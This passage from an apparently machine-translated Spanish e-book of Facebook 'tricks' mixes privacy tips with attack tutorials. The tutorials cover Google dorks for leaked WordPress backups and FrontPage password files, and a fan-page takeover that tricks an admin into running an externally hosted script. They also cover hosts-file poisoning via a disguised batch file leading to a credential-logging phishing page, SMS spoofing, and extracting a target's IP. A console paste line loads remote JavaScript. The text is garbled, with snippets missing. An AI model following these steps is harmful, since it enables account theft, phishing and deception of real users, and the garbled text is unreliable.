Derechos de autorwww.cyber-worldd.blogspot.in
46
así que abra Wireshark y haga clic en las interfaces... como esta
imagen...
Derechos de autorwww.cyber-worldd.blogspot.in
47
Derechos de autorwww.cyber-worldd.blogspot.in
48
Derechos de autorwww.cyber-worldd.blogspot.in
49
Derechos de autorwww.cyber-worldd.blogspot.in
50
Derechos de autorwww.cyber-worldd.blogspot.in
51
Derechos de autorwww.cyber-worldd.blogspot.in
52
Derechos de autorwww.cyber-worldd.blogspot.in
53
[Nivel: Principiante]
Método 2: WordPress!
¡Esto buscará los archivos de copia de seguridad de WordPress que contienen las
contraseñas y todos los datos del sitio! The Dork: tipo de archivo: sql
inurl:wpcontent/
respaldo-*
Método 4: ¡FrontPage!
Esto encontrará todos los usuarios y contraseñas, similar al anterior. El Dork:
ext:pwd inurl:(servicio | autores | administradores | usuarios) "# -
FrontPage-"
Derechos de autorwww.cyber-worldd.blogspot.in
54
Método 8: ¡Obtenga el pase de administrador! Simple idiota que busca todo tipo de
admin infoThe Dork: "información de cuenta de administrador" tipo de archivo: registro
Derechos de autorwww.cyber-worldd.blogspot.in
55
Este tutorial funciona casi al 100%, ya que todos sabemos que es difícil hackear la página de fans de Facebook, pero de alguna manera
cómo funciona este método en alguna página de fans y nos permite hackear la página de fans de Facebook fácilmente. Espero que
puedas hackear cualquier página de fans de Facebook después de leer esta publicación. Por favor, comenta y comparte.
En primer lugar, debemos configurar un exploit y un sitio web para alojar el exploit. Si ya tiene un alojamiento, entonces es genial,
de lo contrario, hay un par de sitios web de alojamiento gratuitos que se pueden usar para propósitos tales como
Descargo de responsabilidad: Coder y los sitios relacionados no son responsables de ningún abuso realizado con este truco.
2) Después de descargar el exploit, debe editarlo con cualquier software de edición, sugiero notepad ++, uno de los
mejores editores. Puedes descargarlo desdeAquí.
3) Abra el archivo llamado pagehack.js con notepad++. Ahora busque el texto [email protected]
presionandoCTRL+Fy reemplácelo con su propia identificación de correo electrónico que utilizó al registrarse en
Facebook.
Derechos de autorwww.cyber-worldd.blogspot.in
56
4) Ahora debes cambiar el texto viral que se enviará a los amigos de las víctimas. Para hacer esto, busque el texto
¡Oye, mira lo que tengo! y substitúyalo por su propio texto. Este texto será enviado al muro de facebook de 15
amigos de la víctima. Dado que es un bot de publicación automática, para evitar que Facebook lo bloquee, reduje su
capacidad a 15. Ahora solo guárdelo como cualquier cosa.js (Consejo: Sea ingeniero social y cámbiele el nombre a
algo más atractivo como getprizes.js o booster .js Como ya he publicado unartículo sobre piratería con ingeniería
social Aquí )
5) Ahora debe cargar este script en su servidor. Para esto, cree una cuenta en 0fess.net o
000webhost.com (t35 o 110mb no ayudarán esta vez) y use filezilla y cargue esto en su raíz. Entonces,
la dirección donde se carga su script será la siguiente:
------------------------------------------------------------------------------------------
- - - - - - - - - - www.yoursite.0fess.net/booster.js
----------------------------------------------------------------------------------------------------
6)Ahora viene la parte más importante de este Hack. Debe convencer al administrador de esa página de fans para que coloque el
siguiente código (Nota: no olvide reemplazar el texto en negrita con la dirección de su secuencia de comandos) en la barra de
direcciones de su navegador y presione Intro mientras está en Facebook.
----------------------------------------------------------------------------------------------------
Consejo: puedes engañarlo haciéndolo codicioso para agarrar algo. También puede codificar esto en formato ASCII para obtener
mejores resultados.
Derechos de autorwww.cyber-worldd.blogspot.in
57
Puede usar el archivo host para asignar cualquier palabra o dominio a una dirección IP oa otro dominio. Por
ejemplo si añadimos
74.125.236.84 www.facebook.com
Al archivo host lo que sucederá es que cuando escribasFacebook.comen su navegador se abrirá google.com
en lugar de facebook.com esto se debe a que (74.125.236.84) esde GoogleIp, por lo que el navegador lo
tomará a ciegas. Entonces, si un atacante es capaz de agregar su dirección IP (donde aloja la página de
phisher), la víctima será redirigida a los atacantes.Sitio de phishing
Lo que hace que este ataque sea tan exitoso es que la víctima no lo sabrá, ya que la URL solo sigue siendo
facebook.com.
Hoy en día, cada uno tiene una dirección IP dinámica (la ip cambia cada vez que reinicia). Ahora, la mayoría
de las computadoras están detrás de un enrutador, por lo que tenemos que redireccionar nuestro servidor
web para acceder a él. Esto es un poco confuso para los novatos.
Pero en este tutorial explicaré cómo puedes superar todos estos problemas.
Demostración
Cosas que necesita: -
1. Página Phisher-Puede descargar la página de Phisher de Facebook desdeAquí (He agregado
una página adicional para que sea más realista, la víctima recibirá un mensaje que dice que
Facebook está bloqueado por su ISP)
Derechos de autorwww.cyber-worldd.blogspot.in
58
2. servidor web-Puede usar wamp o xammp, le recomendaría que use xammp, he escrito un
tutorial sobre cómo puede instalar, usarXamp por favor consulte el artículo para más detalles
3. Una VPN estática-Usaré proXPN VPN para este tutorial, pero le recomiendo que use Strong
Open VPN, ya que es muy estable, puede descargarlo deAquí
Procedimiento:-
2.Descargue la página de Phisher de Facebook Desde el enlace anterior, Coloque todo su contenido en el
documentos htcarpeta que debe estar debajoXamp(lugar donde instaló xampp)
3.InstalarProXPNVPN o cualquier otra estáticavpn,Te recomiendo que uses Strong Vpn ya que es muy
estable y te da una IP estática Una vez que lo instales y lo ejecutes, obtendrás una IP estática (vpn)
4.Ahora tenemos que reemplazar algo de texto en elanfitrión de las víctimasarchivo que es
aC:\windows\system32\drivers\etc.,Puede hacer esto de muchas maneras, ya sea usando un archivo SFX o
usando un archivo por lotes para este tutorial usaremos unarchivo por lotespara realizar el trabajo
@echo apagado
Reemplace "172.X.XX.XX" con su dirección IP (vpn), finalmente guárdelo como Guardarlo como algo
.murciélago
5.Ahora, para evitar sospechas, puede vincular el archivo por lotes con un archivo legítimo. Consulte amablemente el
Carpetas tutorial para más información
6.Ahora envíe el archivo por correo electrónico o cárguelo en un sitio y pídale a la víctima que descargue el archivo.
, Después de la víctimadescargasy hace clic en el archivo, su archivo host será reemplazado, por lo que ahora,
cuando la víctima ingrese a facebook.com, será redirigido a nuestra página Phisher, pero elURLpermanecerá como
Facebook.com
Para ver todas las credenciales de las víctimas y la contraseña abierta recién creadaIniciar sesión.txt que se encuentra debajodocumentos
htcarpeta
Derechos de autorwww.cyber-worldd.blogspot.in
59
Derechos de autorwww.cyber-worldd.blogspot.in
60
Luego vaya a su correo electrónico de Gmail, vaya a nuevo mensaje y ponga el correo electrónico que le
envió y escriba lo que desea publicar en el asunto, deje el mensaje vacío, vaya y revise su muro.
^_̂ Disfruta ;)
Derechos de autorwww.cyber-worldd.blogspot.in
61
Luego haga clic enconectarluego, permita las aplicaciones a través de su cuenta de fb. Luego aparecerá el cuadro
de la máquina de pared. Este cuadro es personalizable editarnombresyFotos. Después de completar todos los
pasos, haga clic enahorrarbotón. Despuésabiertosu archivo guardado en una nueva pestaña y tome una foto
Derechos de autorwww.cyber-worldd.blogspot.in
62
Derechos de autorwww.cyber-worldd.blogspot.in
63
2- Ir a la configuración de la cuenta
Derechos de autorwww.cyber-worldd.blogspot.in
64
de tiempo: -
paso 3: Las capturas de pantalla que se mencionan a continuación lo ayudarán a habilitar esta función: haga
clic en Editar configuración de la línea de tiempo y la opción de etiquetado.
Paso 4: verá una opción "Revise las publicaciones en las que sus amigos lo etiquetan antes de que aparezcan en su línea de tiempo".
Ahora haga clic en "Desactivado" y configúrelo en "Activado" para habilitar esta función para usted.
Después de guardar los cambios, si alguien lo etiqueta en Facebook, obtendrá opciones para aprobar o
desaprobar las publicaciones. Estas publicaciones no estarán visibles en su línea de tiempo hasta que las
apruebe manualmente. Creo que para las niñas sería muy útil.
Derechos de autorwww.cyber-worldd.blogspot.in
sesenta y cinco
NOTA:El esclavo DEBE tener habilitada la función de texto de Facebook en su cuenta, si no la tienen,
esto no funcionará
Entonces, en este truco de Facebook, usaremos SMSGlobal para cambiar el estado de tu amigo. SMSGlobal nos
permite enviar mensajes a cualquier número desde el número de cualquier persona. Es decir, enviaremos a
Facebook un SMS falso desde el número de móvil registrado de tu amigo.
Facebook pensará que el mensaje ha sido enviado por su amigo y su estado se actualizará de acuerdo con el
contenido del mensaje enviado por nosotros.
Derechos de autorwww.cyber-worldd.blogspot.in
66
Derechos de autorwww.cyber-worldd.blogspot.in
67
Este método funciona con la notificación que recibe en su correo electrónico, por ejemplo, si alguien comenta su
estado o le envía un mensaje en Facebook, ¡por supuesto que recibirá la notificación en su correo electrónico!
Entonces, dónde encontrar la IP de su víctima es simple, solo vaya a su correo electrónico y a la notificación y vea la
fuente del mensaje, escriba Ctrl +f y luego busque esto:
X-Facebook: de zuckmail
encontrará un código como este ([MTI3LjAuMC4x]) está codificado en base 64, debe decodificarlo en texto ASCII
y luego encontrará la IP de su objetivo ¡Enj0y!
Herramienta para decodificar y codificar=========>>>Ven aquí para
Derechos de autorwww.cyber-worldd.blogspot.in
68
dispositivo: -
Hola chicos, muchos de ustedes me preguntan acerca de este truco sobre cómo actualizar
el estado de Facebook a través de cualquier dispositivo como i5, blackberry, galaxy s3,
lumia, Android, etc.*Fácil, voy a proporcionarle un sitio web desde donde puede actualizar
su estado a través de cualquier dispositivo, simplemente visite el enlace que figura a
continuación.
puntos a favor:desde este sitio puede actualizar su estado de forma segura, no se producirá
ningún bloqueo de Facebook. Este sitio es spam, está libre de errores y virus. ¡Disfrútelo :)!
Enlace :
http://www.updateviaz.com/
Derechos de autorwww.cyber-worldd.blogspot.in
69
4) Verá todo su grupo de Facebook y una casilla llenará su mensaje y marcará todo.
Derechos de autorwww.cyber-worldd.blogspot.in
70
una vez que haya terminado, su publicación en blanco se mostrará en el muro de su amigo.
Derechos de autorwww.cyber-worldd.blogspot.in
71
Primero irá al inicio de sesión de Facebook después de que pueda ir al chat fuera de línea en la cuenta de
Facebook. Irhttp://www.facebook.com/onlinenow página.
Después de instalar esta aplicación, puede mostrar quién está en línea en Facebook mientras está desconectado en la
cuenta de Facebook
Derechos de autorwww.cyber-worldd.blogspot.in
72
Haga clic en Editar su configuración enAplicaciones y sitios webEn la parte inferior, busque Búsqueda pública
Derechos de autorwww.cyber-worldd.blogspot.in
73
Derechos de autorwww.cyber-worldd.blogspot.in
74
www.veintepies.com
Derechos de autorwww.cyber-worldd.blogspot.in
75
estado de FB: -
www.fliptext.org
Derechos de autorwww.cyber-worldd.blogspot.in
76
http://www.facebook.com/help/contact.php?show_form=fallecido
Derechos de autorwww.cyber-worldd.blogspot.in
77
Si desea agregar a todos sus amigos en el grupo con un solo clic, siga todos los pasos
cuidadosamente.
Ahora Pegar...
document.body.appendChild(document.createElement('script')).src='http://
groupinvites.googlecode.com/files/group-invite.js';
Derechos de autorwww.cyber-worldd.blogspot.in
78
Derechos de autorwww.cyber-worldd.blogspot.in
79
Si tu cuenta personal tiene muchos amigos y también demasiados suscriptores/seguidores. Luego, al migrar la cuenta a la
página, convierte su lista de todos los amigos y la lista de seguidores en la lista de fans de su nueva página.
Tomemos un ejemplo si tiene 5,000 amigos y 15,000 seguidores en la cuenta cuando la convierte. Tu página será de
20.000 fans. ¡Sí! puede verse bien, pero tiene muchos impactos después de la migración.
Ahora aquí viene a la parte principal de este artículo que está esperando, si lee todos los resultados anteriores y
después de que realmente piensa en convertir su cuenta.
Derechos de autorwww.cyber-worldd.blogspot.in
80
En primer lugar, debe iniciar sesión en su cuenta que desea convertir. Luego configure el nombre de su
cuenta porque el nombre de su será el nombre de su página si desea cambiar, luego cámbielo antes de
migrar.
Cuando esté listo para convertir, vaya al centro de ayuda de Facebook y busque migrar
cuenta ovisitar aquí
En el centro de ayuda encontrará una aclaración completa sobre la migración y también proporcionan un enlace de
migración. Si no puede encontrar entoncesvisitar aquí
Esto abrirá la página de migración, se verá igual haciendo un nuevo formulario de página.
Luego seleccione la categoría de su página como negocio, marca o comunidad, etc. Después de seleccionar la
categoría, se les solicitará su contraseña si desea convertir o no.
En algún momento, también muestra este error que inicia sesión en su cuenta desde el dispositivo anterior que usó para iniciar sesión. Así
que no se preocupe, tomará de 24 a 48 horas debido a la seguridad de la cuenta después de este período de tiempo, puede migrar
Después de proporcionar la contraseña, su página se actualizará y comenzará a convertir su cuenta en una página y esperará unos minutos
para completar la conversión de todos los miembros.
Después de completar la conversión, su página está lista para usar. también puede disfrutar de su página desde una cuenta existente o también puede
crear su otra cuenta como administrador por correo electrónico agregando en el panel de administración.
Derechos de autorwww.cyber-worldd.blogspot.in
81
No, esta migración no es reversible, por lo que si migra su cuenta accidentalmente con un nombre incorrecto u otra razón por
error. Entonces, lo siento, amigos, su cuenta ahora tiene un gran problema. Facebook ahora proporciona un formulario de solicitud
para apelar a que se revierta su página en la cuenta. Pero las posibilidades son del 10% solo para un resultado útil porque este
formulario requiere su prueba de identificación que también coincide con el nombre de su cuenta. Entonces, si puede
proporcionar, entonces puedeapelación aquí
Al final, siento que ahora todo este artículo aclara la imagen en tu mente y comprenderás toda la parte sin ninguna duda. Si
tiene algún problema con Facebook, puede preguntarme en cualquier momento. Me pondré en contacto contigo en cuanto
el tiempo me lo permita. Tampoco soy capaz de dar tiempo atrucos seguros para nuevas publicaciones debido a la carga de
estudios. Pero hago lo mejor que puedo.
Así que dé su opinión y no olvide compartir este artículo si lo encuentra útil porque sus esfuerzos son
necesarios para nosotros.
Derechos de autorwww.cyber-worldd.blogspot.in
82
Este truco funciona para Mozilla Firefox, así que pruébalo en Mozilla.
En primer lugar, cambie el proxy de su navegador. Utilice manualmente uno de los proxy que se indican a continuación.
Proxy HTTP:-
119.235.16.41
114.6.15.154
112.215.10.74
PUERTO :- 8080
Después de completar todos los pasos, elimine el proxy manual y seleccione usar la configuración del
proxy del sistema y cambie su idioma a inglés (us)
Nota IMPORTANTE:-En primer lugar, abra la configuración de su cuenta de Facebook y luego cambie el proxy porque en algún momento
Derechos de autorwww.cyber-worldd.blogspot.in
83
Este truco está a punto de insertar la imagen de perfil de cualquier persona en el cuadro de chat. Estetruco ya está publicado anteriormente enNuevos
trucos de chat de Facebok pero muchos de mis amigos están confundidos acerca de este truco. porque no pueden encontrar el nombre de usuario y
Ahora solo hay un método simple para aprender este truco, simplemente mire la imagen a continuación.
Para encontrar el nombre de usuario o la identificación del usuario, simplemente eche un vistazo aquí
Paso 1.
Paso 2.
Derechos de autorwww.cyber-worldd.blogspot.in
84
Paso 3.
Derechos de autorwww.cyber-worldd.blogspot.in
85
En primer lugar, abra su navegador web, le recomiendo que use Google Chrome.
Luego abra su sitio que desea editar como lo estoy haciendogramocon facebook
Presiona enter
Derechos de autorwww.cyber-worldd.blogspot.in
86
Abra Mozilla Firefox y luego instaleComplementos con estilo Haga clic aquí
Luego inicie sesión en suFacebook Cuenta y luego haga clic enSbotón en Agregar una barra. Como se muestra en las siguientes imágenes.
Luego elija cualquier tema que desee. Luego haga clic en el botón Instalar.
Después de la instalación, abra suFacebook entonces verás un resultado increíble... Espero que te guste... :))
Derechos de autorwww.cyber-worldd.blogspot.in
87
Muchos pueblos tienen demasiadasFacebookpero abrir 3,4 o más cuentas al mismo tiempo es un gran
problema para muchas personas porque para iniciar sesión en sus muchas cuentas necesita diferentes
navegadores.
Pero al usar este truco, no es necesario descargar diferentes navegadores para usar Facebook porque Google Chrome tiene
la opción de agregar un nuevo usuario en el que puede navegar de manera diferente creando un nuevo navegador
diferente.
Siga estos sencillos pasos para agregar nuevos usuarios en Google Chrome
Derechos de autorwww.cyber-worldd.blogspot.in
88
www.computerexpertofindia.blogspot.in
www.cyber-worldd.blogpspot.com
Contáctame:[email protected] Agrégame
en Facebook : www.facebook.com/
AnuragAkaProgramm er